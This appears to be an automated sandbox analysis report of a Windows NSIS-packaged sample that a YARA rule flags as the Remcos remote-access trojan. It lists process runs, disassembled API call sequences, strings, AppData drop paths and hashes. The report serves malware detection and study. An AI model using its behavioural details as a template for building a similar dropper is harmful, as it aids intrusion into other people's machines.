MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	21:35:57
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	21:36:38
Start date:	25/04/2024
Path:	C:\Program Files (x86)\Windows Mail\wab.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\windows mail\wab.exe"
Imagebase:	0x300000
File size:	516'608 bytes
MD5 hash:	251E51E2FEDCE8BB82763D39D631EF89
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2923725946.0000000006DEF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	27.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.4%
Total number of Nodes:	1343
Total number of Limit Nodes:	34

Executed Functions

Function 004036D7 Relevance: 86.2, APIs: 31, Strings: 18, Instructions: 444
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00008001), ref: 004036F3
GetVersionExW.KERNEL32 ref: 0040371C
GetVersionExW.KERNEL32(?), ref: 0040372F
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004037D7
#17.COMCTL32(00000008,0000000A,0000000C), ref: 00403811
OleInitialize.OLE32(00000000), ref: 00403818
SHGetFileInfoW.SHELL32(004085A8,00000000,?,000002B4,00000000), ref: 00403837
GetCommandLineW.KERNEL32(00428520,NSIS Error), ref: 0040384C
CharNextW.USER32(00000000,"C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe",?,"C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe",00000000), ref: 00403896
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004039B1
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039C1
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039D9
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004039E6
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004039F7
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403A03

Part of subcall function 00406B40: lstrcpynW.KERNEL32(?,?,00000400,0040384C,00428520,NSIS Error), ref: 00406B4D

DeleteFileW.KERNELBASE(1033), ref: 00403A17

Part of subcall function 004033C8: GetTickCount.KERNEL32 ref: 004033DB
Part of subcall function 004033C8: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe,00000400,?,?,?,?,?), ref: 004033F7

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe",00000000,00000000), ref: 00403ABB
wsprintfW.USER32 ref: 00403AFF
GetFileAttributesW.KERNEL32(Pata c",C:\Users\user\AppData\Local\Temp\), ref: 00403B3E
DeleteFileW.KERNEL32(Pata c"), ref: 00403B54
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B87
CopyFileW.KERNEL32(C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe,Pata c",00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403BA5

Part of subcall function 004065F5: FindFirstFileW.KERNELBASE(00000000,00426E68,00000000,004066A2,00425268), ref: 00406600
Part of subcall function 004065F5: FindClose.KERNEL32(00000000), ref: 0040660C

OleUninitialize.OLE32(00000000), ref: 00403BFE
ExitProcess.KERNEL32 ref: 00403C15
CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,Pata c",00000000), ref: 00403C2F
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403C51
OpenProcessToken.ADVAPI32(00000000), ref: 00403C58
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C6D
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403C90
ExitWindowsEx.USER32(00000002,80040002), ref: 00403CB5

Part of subcall function 0040661C: CharNextW.USER32(?,00403895,"C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe",?,"C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe",00000000), ref: 00406632

Strings

C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe, xrefs: 00403BA0
UXTHEME, xrefs: 004037CB, 004037D0, 004037D6
C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente, xrefs: 00403A8E
TEMP, xrefs: 004039F2
Error launching installer, xrefs: 00403A63
Pata c", xrefs: 00403B13, 00403B39, 00403B4F, 00403B9B, 00403BB1, 00403BE5
\Temp, xrefs: 004039B7
TMP, xrefs: 004039FE
SeShutdownPrivilege, xrefs: 00403C67
C:\Users\user\AppData\Local\Temp\, xrefs: 00403992, 004039AC, 004039BC, 004039CF, 004039E0, 004039E5, 004039EB, 004039F9, 00403AB2, 00403B22, 00403B64, 00403B82, 00403B8F
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004036E3
1033, xrefs: 00403A12
NSIS Error, xrefs: 0040383D
Low, xrefs: 004039DB
C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest, xrefs: 0040397E, 00403A83, 00403ACD, 00403ADB
C:\Users\user\Desktop, xrefs: 00403AD6
~nsu%X.tmp, xrefs: 00403AF9
"C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe", xrefs: 00403853, 00403858, 0040388F, 00403A38, 00403A44

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: File$Process$CharCloseCurrentDeleteDirectoryEnvironmentExitFindNextPathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCommandCopyCountErrorFirstHandleInfoInitializeLineLookupModeModuleNameOpenPrivilegePrivilegesTickUninitializeValuelstrcpynwsprintf
String ID: "C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe"$1033$C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest$C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$Pata c"$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
API String ID: 1265021196-63840726
Opcode ID: 6e72c599556f6d53e7c8a7d6e71ce980aa4490f250c8596acaa94938f6b8808a
Instruction ID: c0b1d9e646d8e221ab378427d31961f808d9ea5217b01dbc056974715919ac4b
Opcode Fuzzy Hash: 6e72c599556f6d53e7c8a7d6e71ce980aa4490f250c8596acaa94938f6b8808a
Instruction Fuzzy Hash: 48E12770204311BAD7207F619D46B2B3AE8AB4874AF51443FF582F62D1DBBC9E01876D

Uniqueness

Uniqueness Score: -1.00%

Function 00404B65 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00404BC6
GetDlgItem.USER32(?,000003EE), ref: 00404BD6
GetClientRect.USER32(00000000,?), ref: 00404C13
GetSystemMetrics.USER32(00000002), ref: 00404C1B
SendMessageW.USER32(00000000,00001061,00000000,00000002), ref: 00404C3D
SendMessageW.USER32(00000000,00001036,00004000,00004000), ref: 00404C4C
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00404C5A
SendMessageW.USER32(00000000,00001026,00000000,?), ref: 00404C64

Part of subcall function 00405ECE: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004060A0

SendMessageW.USER32(00000000,00001024,00000000,?), ref: 00404C76
ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404C9A
ShowWindow.USER32(00000000,00000008), ref: 00404CAC
GetDlgItem.USER32(?,000003EC), ref: 00404CCE
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00404CE2
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00404CFD
SendMessageW.USER32(00000000,00002001,00000000,?), ref: 00404D07
ShowWindow.USER32(00000000), ref: 00404D7C
ShowWindow.USER32(?,00000008), ref: 00404D81
GetDlgItem.USER32(?,000003F8), ref: 00404BE6

Part of subcall function 00405538: SendMessageW.USER32(00000028,?,00000001,0040536D), ref: 00405546

GetDlgItem.USER32(?,000003EC), ref: 00404D27
CreateThread.KERNELBASE(00000000,00000000,Function_00005899,00000000), ref: 00404D35
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00404D3C
ShowWindow.USER32(00000008), ref: 00404DB7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404DF6
CreatePopupMenu.USER32 ref: 00404E0A
AppendMenuW.USER32(?,00000000,00000001,00000000), ref: 00404E26
GetWindowRect.USER32(?,?), ref: 00404E44
TrackPopupMenu.USER32(?,00000180,?,?,00000000,?,00000000), ref: 00404E66
SendMessageW.USER32(?,00001073,00000000,?), ref: 00404E95
OpenClipboard.USER32(00000000), ref: 00404EA5
EmptyClipboard.USER32 ref: 00404EAB
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00404EB7
GlobalLock.KERNEL32(00000000), ref: 00404EC4
SendMessageW.USER32(?,00001073,00000000,?), ref: 00404EE0
GlobalUnlock.KERNEL32(?), ref: 00404F03
SetClipboardData.USER32(0000000D,?), ref: 00404F0E
CloseClipboard.USER32 ref: 00404F14

Strings

Farserer248 Setup: Completed, xrefs: 00404E78

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlocklstrcat
String ID: Farserer248 Setup: Completed
API String ID: 2449414213-2307343146
Opcode ID: 1f3e19829a1891f8564f85fc036817145a0997e7e9e6b60a717e84ac5e359c57
Instruction ID: 02fe976126cbaf1a6fc3493159206c2a1d104913882a8157006961078fd299e5
Opcode Fuzzy Hash: 1f3e19829a1891f8564f85fc036817145a0997e7e9e6b60a717e84ac5e359c57
Instruction Fuzzy Hash: AFA1A1B1605304BBD720AF25DE49E5B7FADFF88750F00443EF685A62A1CB789841CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040673F Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 155
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040665E: lstrlenW.KERNEL32(00425268,00000000,00425268,00425268,00000000,?,?,00406761,?,00000000,74DF3420,?), ref: 004066B2
Part of subcall function 0040665E: GetFileAttributesW.KERNEL32(00425268,00425268), ref: 004066C3

DeleteFileW.KERNELBASE(?,?,00000000,74DF3420,?), ref: 0040676B
lstrcatW.KERNEL32(00424A68,\*.*), ref: 004067BD
lstrcatW.KERNEL32(?,004082A8), ref: 004067DE
lstrlenW.KERNEL32(?), ref: 004067E1
FindFirstFileW.KERNELBASE(00424A68,?), ref: 004067F8
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?), ref: 00406889
FindClose.KERNEL32(00000000), ref: 0040689B

Strings

\*.*, xrefs: 004067B3

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
String ID: \*.*
API String ID: 2636146433-1173974218
Opcode ID: c7d4ca52d67952e378cbb2bc69a9f218064257e9e4fb8312320eab13a4bc46f3
Instruction ID: 040231968607b34bb9b2a158c1771ed677aa5033f3f67d588a95bfd1cb23e0ea
Opcode Fuzzy Hash: c7d4ca52d67952e378cbb2bc69a9f218064257e9e4fb8312320eab13a4bc46f3
Instruction Fuzzy Hash: 2F4158321063116AD720BB759C09A6B72ACDF81354F12453FF993B21C0EB3C896286AF

Uniqueness

Uniqueness Score: -1.00%

Function 004065F5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000000,00426E68,00000000,004066A2,00425268), ref: 00406600
FindClose.KERNEL32(00000000), ref: 0040660C

Strings

hnB, xrefs: 004065F6

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: hnB
API String ID: 2295610775-3660129567
Opcode ID: 04c39e9a30e6258c39c491fedc79fdf69c05ad29cfe5a9b76075cd2b9a189e7b
Instruction ID: 2ada44957634f94fe16e3b7c78607cf3dae8e736d14f09947eb472504c9aac78
Opcode Fuzzy Hash: 04c39e9a30e6258c39c491fedc79fdf69c05ad29cfe5a9b76075cd2b9a189e7b
Instruction Fuzzy Hash: 3AD012355561305BC6501738AE0C84B7A989F553717664E36B4A6F61E0C7758C238AEC

Uniqueness

Uniqueness Score: -1.00%

Function 0040234F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004089C0,?,00000001,004089A0,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004023D8

Strings

C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente, xrefs: 0040241F

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente
API String ID: 542301482-475788456
Opcode ID: 0ea40ecb82d0f2f26ff925ecff68251062728646c1acf61687deaf65a66fff07
Instruction ID: 3a7555ac320af53449748993ff378327c1ec87e06d1af7ab7e734bd0b58c3ef6
Opcode Fuzzy Hash: 0ea40ecb82d0f2f26ff925ecff68251062728646c1acf61687deaf65a66fff07
Instruction Fuzzy Hash: 71414B72604341AFC310EFA5C948A2BBBE9FF89314F10092EF695DB291DB79D805CB16

Uniqueness

Uniqueness Score: -1.00%

Function 00402B75 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402B85

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 76b3c85830a32840b029d22442974bdb841403041b69b6fbe40bf988d6f2a91d
Instruction ID: 413ff2f9ee0246481f93823f5d824a9f083a43ab9ee229324fd948d7b793fb49
Opcode Fuzzy Hash: 76b3c85830a32840b029d22442974bdb841403041b69b6fbe40bf988d6f2a91d
Instruction Fuzzy Hash: E4D0EC61414550AAD1606F718D49EBA73ADAF05354F204A3EF196E10D1EAB85501932B

Uniqueness

Uniqueness Score: -1.00%

Function 00404FC7 Relevance: 63.4, APIs: 35, Strings: 1, Instructions: 374
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00405006
ShowWindow.USER32(?), ref: 00405030
GetWindowLongW.USER32(?,000000F0), ref: 00405041
ShowWindow.USER32(?,00000004), ref: 0040505D
GetDlgItem.USER32(?,00000001), ref: 00405184
GetDlgItem.USER32(?,00000002), ref: 0040518E
SetClassLongW.USER32(?,000000F2,?), ref: 004051A8
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004051F6
GetDlgItem.USER32(?,00000003), ref: 004052A5
ShowWindow.USER32(00000000,?), ref: 004052CE
KiUserCallbackDispatcher.NTDLL(?,?), ref: 004052E2
KiUserCallbackDispatcher.NTDLL(?), ref: 004052F6
EnableWindow.USER32(?), ref: 0040530E
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405325
EnableMenuItem.USER32(00000000), ref: 0040532C
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040533D
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00405354
lstrlenW.KERNEL32(Farserer248 Setup: Completed,?,Farserer248 Setup: Completed,00000000), ref: 00405385

Part of subcall function 00405ECE: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004060A0

SetWindowTextW.USER32(?,Farserer248 Setup: Completed), ref: 0040539D

Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409

DestroyWindow.USER32(?,00000000), ref: 004053E5
CreateDialogParamW.USER32(?,?,-0042953F), ref: 00405419

Part of subcall function 0040554F: SetDlgItemTextW.USER32(?,?,00000000), ref: 00405569

GetDlgItem.USER32(?,000003FA), ref: 00405442
GetWindowRect.USER32(00000000), ref: 00405449
ScreenToClient.USER32(?,?), ref: 00405455
SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 0040546E
ShowWindow.USER32(00000008,?,00000000), ref: 0040548D

Part of subcall function 0040551D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040552F

ShowWindow.USER32(?,0000000A), ref: 004054D3

Strings

Farserer248 Setup: Completed, xrefs: 00405373, 00405380, 00405397

Memory Dump Source

Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd

Similarity

API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuTextUser$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
String ID: Farserer248 Setup: Completed
API String ID: 162979904-2307343146
Opcode ID: df99ce79e6b8f8b1480dc5df11ce5c5cdba03e855b63a6f49142b7d1858faae1
Instruction ID: 1387c8c623e38711ffdf662ef8fd173483c39d2718f6c4d101912cea3ea6818b
Opcode Fuzzy Hash: df99ce79e6b8f8b1480dc5df11ce5c5cdba03e855b63a6f49142b7d1858faae1
Instruction Fuzzy Hash: 66D1D3B1601A11BBDB316F21DE08E2B7BA8FB44354F50453EF546B21A1CA789892CF6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405A73 Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 225
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040690C: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EB,0000000C), ref: 0040691A
Part of subcall function 0040690C: GetProcAddress.KERNEL32(00000000), ref: 00406936

lstrcatW.KERNEL32(1033,Farserer248 Setup: Completed), ref: 00405AF6
lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest,1033,Farserer248 Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Farserer248 Setup: Completed,00000000,00000002,00000000), ref: 00405B7A
lstrcmpiW.KERNEL32(-000000FC,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest,1033,Farserer248 Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Farserer248 Setup: Completed,00000000), ref: 00405B8F
GetFileAttributesW.KERNEL32(: Completed), ref: 00405B9A
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest), ref: 00405BE3

Part of subcall function 00406645: wsprintfW.USER32 ref: 00406652

RegisterClassW.USER32(004284C0), ref: 00405C28
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405C3F
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405C74
ShowWindow.USER32(00000005,00000000), ref: 00405CA6
GetClassInfoW.USER32(00000000,RichEdit20W,004284C0), ref: 00405CD1
GetClassInfoW.USER32(00000000,RichEdit,004284C0), ref: 00405CDE
RegisterClassW.USER32(004284C0), ref: 00405CEB
DialogBoxParamW.USER32(?,00000000,00404FC7,00000000), ref: 00405D06

Strings

RichEdit20W, xrefs: 00405CCB, 00405CE1
RichEd20, xrefs: 00405CAC
Control Panel\Desktop\ResourceLocale, xrefs: 00405AB3
1033, xrefs: 00405A96, 00405ABA, 00405AF1
RichEd32, xrefs: 00405CBA
.DEFAULT\Control Panel\International, xrefs: 00405AE1
.exe, xrefs: 00405B89
Farserer248 Setup: Completed, xrefs: 00405AA6, 00405AB1, 00405AD1, 00405ADB, 00405AF0
